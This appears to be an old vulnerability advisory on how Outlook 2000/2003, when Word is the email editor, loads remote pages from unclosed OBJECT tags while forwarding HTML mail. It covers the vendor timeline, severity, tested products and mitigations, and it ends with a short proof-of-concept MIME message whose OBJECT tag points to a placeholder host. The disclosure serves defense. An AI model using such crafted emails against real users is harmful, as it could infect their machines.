==============================================
Microsoft Word Email Object Data Vulnerability
==============================================


==============================================
Summary:
==============================================
Outlook 2000 and 2003 allow execution of remote web pages specified
within the data property of OBJECT tags when there is no closing /OBJECT
tag, while forwarding an HTML email message using Word 2000 or 2003 as
the email editor. This behavior happens regardless of Security Zone
settings - it completely ignores them.

Spammed exploits are very much in the wild and are affecting systems
even if the bug is beyond the scope of the spammers' original intent. 

==============================================
Vendor notification: 
==============================================
June 8 - email to secure@microsoft.com (no response)
June 14 - email again to secure@microsoft.com, initial response came
same day
June 15 through July 2 - Several messages back and forth
July 2 - final and detailed response from Microsoft
Result: They consider it a variation of web bug behavior, and may take
care of it in future Office releases if they decide to modify Outlook's
download behavior when forwarding and replying.
 
**********************
Disclaimer: Testing was very limited. There are probably mistakes and
holes in my analysis, and this all needs to be reviewed further. Use at
your own risk, no liability for misuse, etc.
**********************

==============================================
Severity: 
==============================================
I consider it at least moderate because large volumes of spam easily
overcome long odds of exploiting it in any given case. Plus because many
people believe they are immune to old-fashioned OBJECT data exploits if
they are up to date on their patches. Plus the apparent Security Zone
bypass side of it may indicate additional more serious risks in Word
email.

==============================================
Products tested
==============================================
Affected:
Outlook 2003 with MS Word 2003 as the email editor on XP Pro SP1
Outlook 2000 with MS Word 2000 as the email editor on Win2K Pro SP4

Not affected:
Outlook 2003 with its own email editor on XP Pro SP1 
Outlook 2000 with its own email editor on Win2K Pro SP4

Not tested:
No other configurations tested.

==============================================
Details:
==============================================
The OBJECT tag gets processed on any version of Outlook but blocks
ActiveX controls if it is up to patch rev (anything since 2000) with
default Restricted Zone settings. This is working fine on the affected
system until one specific scenario:

When using MS Word as the email editor and forwarding an HTML email
message containing an OBJECT tag with no closing /OBJECT, MS Word
downloads the page referred to in the "data" property of the OBJECT with
no prompt to the user.

So if the user forwards a spam message to someone (such as their mail
administrator), the user may infect their own computer.

This only works when forwarding a message - not when replying. It also
only appears to work if the OBJECT tag is not closed with a /OBJECT.

==============================================
Fix:
==============================================
None available AFAIK

==============================================
Mitigators:
==============================================
- Don't use Word as the email editor
- Don't forward spam messages, just forward headers or source from
Tools>Options
- Filter HTML mail containing OBJECT tags, whether enclosed by HTML tags
or not, and especially if there is no closing /OBJECT

Those mitigators stop the execution of the OBJECT data reference

Frequently suggested mitigators that do not help so much:
- Removing the HTA MIME-Type, and killbitting the adodb.stream and
shell.application controls, do not help.
- Outlook Restricted Zone settings do not help.
- Locking down the My Computer security zone does not help.

Those mitigators don't stop execution but may help stop secondary
exploits that might be hosted at the OBJECT data reference.

==============================================
Proof of concept:
==============================================
Check your spam for OBJECT tags that call Web URLs. This stuff is
everywhere. Here is the basic idea:

MIME-Version: 1.0
Content-Type: multipart/alternative;
  boundary="--001"

----001
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

|object data=3D"http://www.foobar.foo/page.php"|

----001--